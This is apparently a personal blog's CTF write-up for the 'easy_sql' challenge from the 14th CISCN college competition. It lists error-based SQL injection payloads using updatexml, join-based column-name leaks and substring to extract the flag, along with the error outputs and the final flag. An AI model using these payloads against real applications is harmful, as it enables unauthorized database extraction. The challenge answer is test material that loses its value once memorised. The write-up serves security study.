第十四届全国大学生CTF比赛

| | | | 336

easy_sql

1、通过报错注入获取flag的字段名id

1
1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b)c)),0x2e)#

2、通过的方式获取flag的字段名no

1
1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id))c)),0x2e)#

3、在获取id及之后字段名no字段名’b803ed64-14a9-474f-9832-b854b23d3014’

1
1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id,no))c)),0x2e)#

4、通过字段名获取flag的一部分

1
2
需要将单引号该成反引号
`b803ed64-14a9-474f-9832-b854b23d3014`
1
1') or updatexml(0x2e,concat(0x2e,(select `b803ed64-14a9-474f-9832-b854b23d3014` from flag)),0x2e)#
1
TH syntax error: 'CISCN{z9ZeE-peOfv-Wemp4-GE5FV-51'

5、通过substring(str,10,20)这个函数进行后半部分显示

1
1') or updatexml(0x2e,concat(0x2e,(select substring(`b803ed64-14a9-474f-9832-b854b23d3014`,10,20) from flag)),0x2e)#
1
TH syntax error: 'eE-peOfv-Wemp4-GE5FV'

5、通过substring(str,20,30)这个函数进行后半部分显示

1
1') or updatexml(0x2e,concat(0x2e,(select substring(`b803ed64-14a9-474f-9832-b854b23d3014`,20,30) from flag)),0x2e)#
1
TH syntax error: 'emp4-GE5FV-51yUy-}'

6、删除重复部分

1
2
3
4
5
6
7
8
9
10
第一部分
TH syntax error: 'CISCN{z9ZeE-peOfv-Wemp4-GE5FV-51'
第二部分
TH syntax error: 'eE-peOfv-Wemp4-GE5FV'
第三部分
TH syntax error: 'emp4-GE5FV-51yUy-}'

删除重复部分
得出答案
CISCN{z9ZeE-peOfv-Wemp4-GE5FV-51yUy-}

本文标题:第十四届全国大学生CTF比赛

文章作者:孤桜懶契

发布时间:2021年05月15日 - 16:17:12

最后更新:2021年10月20日 - 13:22:01

原始链接:https://gylq.gitee.io/posts/72.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️